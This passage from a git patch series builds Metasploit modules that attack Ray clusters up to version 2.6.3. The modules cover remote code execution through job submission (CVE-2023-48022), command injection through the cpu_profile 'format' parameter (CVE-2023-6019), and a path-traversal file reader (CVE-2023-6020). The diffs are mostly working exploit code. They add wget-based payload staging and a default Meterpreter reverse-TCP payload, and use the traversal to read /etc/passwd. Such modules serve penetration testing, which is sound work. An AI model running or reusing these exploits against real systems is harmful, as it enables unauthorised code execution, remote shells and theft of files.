- 'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'), - 'data' => { 'entrypoint' => cmd }.to_json - }) - end - return unless res && res.code == 200 - - JSON.parse(res.body) - end - - def lfi - fail_with(Failure::Unknown, 'FILEPATH required when ATTACK is LFI') unless datastore['FILEPATH'] - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") - }) - return unless res && res.code == 200 - - res.body - end - - def check - case datastore['ATTACK'] - when 'CMDi' - @nodes = get_nodes - return Exploit::CheckCode::Safe if @nodes.nil? - when 'RCE' - @job_data = get_job_data(datastore['COMMAND']) - return Exploit::CheckCode::Safe if @job_data.nil? - when 'LFI' - @file_content = lfi - return Exploit::CheckCode::Safe if @file_content.nil? - - return Exploit::CheckCode::Vulnerable - end - Exploit::CheckCode::Detected - end - - def exploit - case datastore['ATTACK'] - when 'CMDi' - # We need to pass valid node info to /worker/cpu_profile for the server to process the request - # First we list all nodes and grab the pid and ip of the first one (could be any) - @nodes ||= get_nodes - fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes - first_node = @nodes['data']['summary'].first - fail_with(Failure::Unknown, 'Failed to get pid') unless first_node.key?('agent') && first_node['agent'].key?('pid') - pid = first_node['agent']['pid'] - fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip') - ip = first_node['ip'] - print_good("Grabbed node info, pid: #{pid}, ip: #{ip}") - opts = { pid: pid, ip: ip } - res = execute_command(datastore['COMMAND'], opts) - fail_with(Failure::Unknown, 'Failed to execute command') unless res - print_good("Command execution seems to have been successful. Status code: #{res.code}") - execute_cmdstager({ flavor: :wget }.merge(opts)) - when 'RCE' - @job_data ||= get_job_data(datastore['COMMAND']) - print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") - execute_cmdstager({ flavor: :wget }) - when 'LFI' - @file_content ||= lfi - print_good("#{datastore['FILEPATH']}\n#{@file_content}") - end - end - - def execute_command(cmd, opts = {}) - case datastore['ATTACK'] - when 'CMDi' - send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), - 'vars_get' => { - 'pid' => opts[:pid], - 'ip' => opts[:ip], - 'duration' => 5, - 'native' => 0, - 'format' => "`#{cmd}`" - } - }) - when 'RCE' - get_job_data(cmd) - end - end - -end From eeab7ce2a22db3cb0a90394366d758d1ddd6e45f Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 16 Aug 2024 08:23:50 +0900 Subject: [PATCH 25/42] Proceed when user specified cmd fails --- modules/exploits/linux/http/ray_agent_job_rce.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index 96534522fb..0c941557f7 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -85,8 +85,9 @@ class MetasploitModule < Msf::Exploit::Remote def exploit @job_data ||= get_job_data(datastore['COMMAND']) - fail_with(Failure::Unknown, 'Failed to get job_data') unless @job_data - print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") + if @job_data + print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") + end execute_cmdstager({ flavor: :wget }) end From 7258ca4fb19e92f2bbd235a5ecf2a7d65c9bb8c2 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 16 Aug 2024 08:49:34 +0900 Subject: [PATCH 26/42] Remove unnecessary option for simplicity --- .../modules/exploit/linux/http/ray_agent_job_rce.md | 4 ---- modules/exploits/linux/http/ray_agent_job_rce.rb | 5 ++--- 2 files changed, 2 insertions(+), 7 deletions(-) diff --git a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md index 880d41aa4e..2a55c1d9bd 100644 --- a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md +++ b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md @@ -33,10 +33,6 @@ This module was successfully tested on: ## Options -### COMMAND (Required) - -This is the command to execute. Default is `echo 'Hello from Metasploit'`. - ## Scenarios ### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index 0c941557f7..81d9d1f279 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -53,7 +53,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), - OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), ] ) end @@ -77,14 +76,14 @@ class MetasploitModule < Msf::Exploit::Remote end def check - @job_data = get_job_data(datastore['COMMAND']) + @job_data = get_job_data('ls') return Exploit::CheckCode::Safe if @job_data.nil? Exploit::CheckCode::Detected end def exploit - @job_data ||= get_job_data(datastore['COMMAND']) + @job_data ||= get_job_data('ls') if @job_data print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") end From 209f172aa1c06c99e2a056ce6cedf1493a2cebcd Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 16 Aug 2024 08:56:01 +0900 Subject: [PATCH 27/42] Update document --- documentation/modules/exploit/linux/http/ray_agent_job_rce.md | 1 + 1 file changed, 1 insertion(+) diff --git a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md index 2a55c1d9bd..40912be708 100644 --- a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md +++ b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md @@ -32,6 +32,7 @@ This module was successfully tested on: 7. You should get a shell or meterpreter ## Options +No options ## Scenarios From f902ae84fe9b5c0068c4cb18dea97dd6aade32c8 Mon Sep 17 00:00:00 2001 From: Takahiro Yokoyama Date: Tue, 20 Aug 2024 07:45:38 +0900 Subject: [PATCH 28/42] Update modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb Avoid check method being controlled by the 'FILEPATH' content Co-authored-by: Diego Ledda --- modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb index e50dd4898b..9117c24432 100644 --- a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb +++ b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb @@ -45,10 +45,19 @@ class MetasploitModule < Msf::Auxiliary end def check - @file_content = lfi - return Exploit::CheckCode::Safe if @file_content.nil? + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'api/version') + }) + return Exploit::CheckCode::Unknown unless res && res.code == 200 - Exploit::CheckCode::Vulnerable + ray_version = res.get_json_document['ray_version'] + + return Exploit::CheckCode::Unknown unless ray_version + + return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') + + return Exploit::CheckCode::Appears end def lfi From 12320803409a7ba29b6488f133c9590884e99a8f Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 08:09:12 +0900 Subject: [PATCH 29/42] Update lfi module --- modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb index 9117c24432..13d52cb1f0 100644 --- a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb +++ b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb @@ -57,13 +57,16 @@ class MetasploitModule < Msf::Auxiliary return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') + file_content = lfi('/etc/passwd') + return Exploit::CheckCode::Vulnerable unless file_content.nil? + return Exploit::CheckCode::Appears end - def lfi + def lfi(filepath) res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") + 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{filepath}") }) return unless res && res.code == 200 @@ -71,9 +74,9 @@ class MetasploitModule < Msf::Auxiliary end def run - @file_content ||= lfi - fail_with(Failure::Unknown, 'Failed to execute LFI') unless @file_content - print_good("#{datastore['FILEPATH']}\n#{@file_content}") + file_content = lfi(datastore['FILEPATH']) + fail_with(Failure::Unknown, 'Failed to execute LFI') unless file_content + print_good("#{datastore['FILEPATH']}\n#{file_content}") end end From 17ea7d2b723c233e3c531c5ed4e586568db300c8 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 08:15:16 +0900 Subject: [PATCH 30/42] Remove explicit return --- modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb index 13d52cb1f0..de0066a486 100644 --- a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb +++ b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb @@ -60,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary file_content = lfi('/etc/passwd') return Exploit::CheckCode::Vulnerable unless file_content.nil? - return Exploit::CheckCode::Appears + Exploit::CheckCode::Appears end def lfi(filepath) From 5be7e09ff0cea6b5e23b75c75706348c3321d7f5 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 08:21:48 +0900 Subject: [PATCH 31/42] Update check to use version info --- .../exploits/linux/http/ray_agent_job_rce.rb | 18 +++++++++++++++--- 1 file changed, 15 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index 81d9d1f279..8ea87f6ba8 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -76,10 +76,22 @@ class MetasploitModule < Msf::Exploit::Remote end def check - @job_data = get_job_data('ls') - return Exploit::CheckCode::Safe if @job_data.nil? + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'api/version') + }) + return Exploit::CheckCode::Unknown unless res && res.code == 200 - Exploit::CheckCode::Detected + ray_version = res.get_json_document['ray_version'] + + return Exploit::CheckCode::Unknown unless ray_version + + return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') + + @job_data = get_job_data('ls') + return Exploit::CheckCode::Vulnerable unless @job_data.nil? + + Exploit::CheckCode::Appears end def exploit From a5b9d553fad144f58e4c7bfbc7dc10aa2116d3a1 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 08:25:27 +0900 Subject: [PATCH 32/42] Update check to use version info --- ..._cpu_profile_cmd_injection_cve_2023_6019.rb | 18 +++++++++++++++--- 1 file changed, 15 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb index 0dafcf6bfa..2172e4304e 100644 --- a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb @@ -66,10 +66,22 @@ class MetasploitModule < Msf::Exploit::Remote end def check - @nodes = get_nodes - return Exploit::CheckCode::Safe if @nodes.nil? + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'api/version') + }) + return Exploit::CheckCode::Unknown unless res && res.code == 200 - Exploit::CheckCode::Detected + ray_version = res.get_json_document['ray_version'] + + return Exploit::CheckCode::Unknown unless ray_version + + return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') + + @nodes = get_nodes + return Exploit::CheckCode::Vulnerable unless @nodes.nil? + + Exploit::CheckCode::Appears end def exploit From 64bdf54bb07ed5a90dec4bafe5f82b1b7b7a0c53 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 08:56:05 +0900 Subject: [PATCH 33/42] Use Fetch Payload (Not tested) --- modules/exploits/linux/http/ray_agent_job_rce.rb | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index 8ea87f6ba8..7c7142fa3c 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -38,7 +38,14 @@ class MetasploitModule < Msf::Exploit::Remote 'Targets' => [ [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], - [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] + [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ], + [ + 'Linux Command', { + 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp' + } + } + ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-11-15', @@ -99,7 +106,12 @@ class MetasploitModule < Msf::Exploit::Remote if @job_data print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") end - execute_cmdstager({ flavor: :wget }) + case target['Type'] + when :nix_cmd + execute_command(payload.encoded) + else + execute_cmdstager({ flavor: :wget }) + end end def execute_command(cmd, _opts = {}) From 99c81d78213bb4276b8726da3f47c65a70e76185 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 08:59:39 +0900 Subject: [PATCH 34/42] Set default fetch_command to wget --- modules/exploits/linux/http/ray_agent_job_rce.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index 7c7142fa3c..c1f03ce5c4 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -42,7 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Linux Command', { 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp' + 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', + 'FETCH_COMMAND' => 'WGET' } } ] From 52852cea7278a1d1da5587897e23cff77c8a6562 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 12:59:52 +0900 Subject: [PATCH 35/42] Add cve ref --- documentation/modules/exploit/linux/http/ray_agent_job_rce.md | 2 +- modules/exploits/linux/http/ray_agent_job_rce.rb | 4 +++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md index 40912be708..e6469f77ea 100644 --- a/documentation/modules/exploit/linux/http/ray_agent_job_rce.md +++ b/documentation/modules/exploit/linux/http/ray_agent_job_rce.md @@ -1,6 +1,6 @@ ## Vulnerable Application -Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint +Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint (CVE-2023-48022) The vulnerability affects: diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index c1f03ce5c4..b0b43bbe49 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -27,6 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2023-48022'], ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'], ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/'] ], @@ -41,7 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ], [ 'Linux Command', { - 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { + 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', 'FETCH_COMMAND' => 'WGET' } From 45677898a8045f7ff28d0a8672bc74a1a45911dc Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 13:08:01 +0900 Subject: [PATCH 36/42] Add TARGET_URI --- modules/exploits/linux/http/ray_agent_job_rce.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index b0b43bbe49..e107d5b912 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -63,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), + Msf::OptString.new('TARGET_URI', [ false, 'URI', '/']) ] ) end From 01b2a1c55cb9f26bee1fbbadfa52c873eb5dbcf4 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 13:20:42 +0900 Subject: [PATCH 37/42] Enable fetch payload --- ...cpu_profile_cmd_injection_cve_2023_6019.rb | 19 +++++++++++++++++-- 1 file changed, 17 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb index 2172e4304e..dcf3a27296 100644 --- a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb @@ -36,7 +36,16 @@ class MetasploitModule < Msf::Exploit::Remote 'Targets' => [ [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], - [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] + [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ], + [ + 'Linux Command', { + 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', + 'FETCH_COMMAND' => 'WGET' + } + } + ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-11-15', @@ -51,6 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), + Msf::OptString.new('TARGET_URI', [ false, 'URI', '/']) ] ) end @@ -95,7 +105,12 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip') ip = first_node['ip'] print_good("Grabbed node info, pid: #{pid}, ip: #{ip}") - execute_cmdstager({ flavor: :wget, pid: pid, ip: ip }) + case target['Type'] + when :nix_cmd + execute_command(payload.encoded, { pid: pid, ip: ip }) + else + execute_cmdstager({ flavor: :wget, pid: pid, ip: ip }) + end end def execute_command(cmd, opts = {}) From 4d1782640b8d147e34102c172ff3bc0402483a8d Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 19:12:18 +0900 Subject: [PATCH 38/42] Update sideeffects --- modules/exploits/linux/http/ray_agent_job_rce.rb | 2 +- .../linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index e107d5b912..da7fcbc6d1 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DisclosureDate' => '2023-11-15', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], - 'SideEffects' => [], + 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION, ] } ) diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb index dcf3a27296..b6eb8ff2cc 100644 --- a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DisclosureDate' => '2023-11-15', 'Notes' => { 'Stability' => [ CRASH_SAFE, ], - 'SideEffects' => [], + 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION, ] } ) From 91167fc85faa8c0ea9880ed1a1cb60494760e476 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Tue, 20 Aug 2024 21:44:11 +0900 Subject: [PATCH 39/42] Remove unnecessary option --- modules/exploits/linux/http/ray_agent_job_rce.rb | 1 - .../linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb | 1 - 2 files changed, 2 deletions(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index da7fcbc6d1..a340e4133b 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -63,7 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), - Msf::OptString.new('TARGET_URI', [ false, 'URI', '/']) ] ) end diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb index b6eb8ff2cc..f0a3dbbce1 100644 --- a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb @@ -60,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), - Msf::OptString.new('TARGET_URI', [ false, 'URI', '/']) ] ) end From c66540ef2f16d65e74a39e2085b961601d6bec5a Mon Sep 17 00:00:00 2001 From: Takahiro Yokoyama Date: Wed, 21 Aug 2024 21:38:37 +0900 Subject: [PATCH 40/42] Update modules/exploits/linux/http/ray_agent_job_rce.rb use MeterpreterTryToFork to avoid a meterpreter session get killed Co-authored-by: Diego Ledda --- modules/exploits/linux/http/ray_agent_job_rce.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb index a340e4133b..5f9da80d80 100644 --- a/modules/exploits/linux/http/ray_agent_job_rce.rb +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -45,7 +45,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', - 'FETCH_COMMAND' => 'WGET' + 'FETCH_COMMAND' => 'WGET', + 'MeterpreterTryToFork' => true } } ] From ee58313d64f26ec2b9bbc7031993c18ece816505 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 21 Aug 2024 22:09:56 +0900 Subject: [PATCH 41/42] Update check function --- .../linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb index f0a3dbbce1..f047a0e271 100644 --- a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb @@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Unknown unless ray_version - return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') + return Exploit::CheckCode::Safe unless Rex::Version.new('2.2.0') <= Rex::Version.new(ray_version) && Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') @nodes = get_nodes return Exploit::CheckCode::Vulnerable unless @nodes.nil? From 39f81e0a45c65d28c54bdc43271cea1dd30c14a2 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 21 Aug 2024 22:32:53 +0900 Subject: [PATCH 42/42] Update check function --- .../linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb index f047a0e271..c385960274 100644 --- a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb @@ -85,7 +85,8 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Unknown unless ray_version - return Exploit::CheckCode::Safe unless Rex::Version.new('2.2.0') <= Rex::Version.new(ray_version) && Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3') + ray_version = Rex::Version.new(ray_version) + return Exploit::CheckCode::Safe unless Rex::Version.new('2.2.0') <= ray_version && ray_version <= Rex::Version.new('2.6.3') @nodes = get_nodes return Exploit::CheckCode::Vulnerable unless @nodes.nil?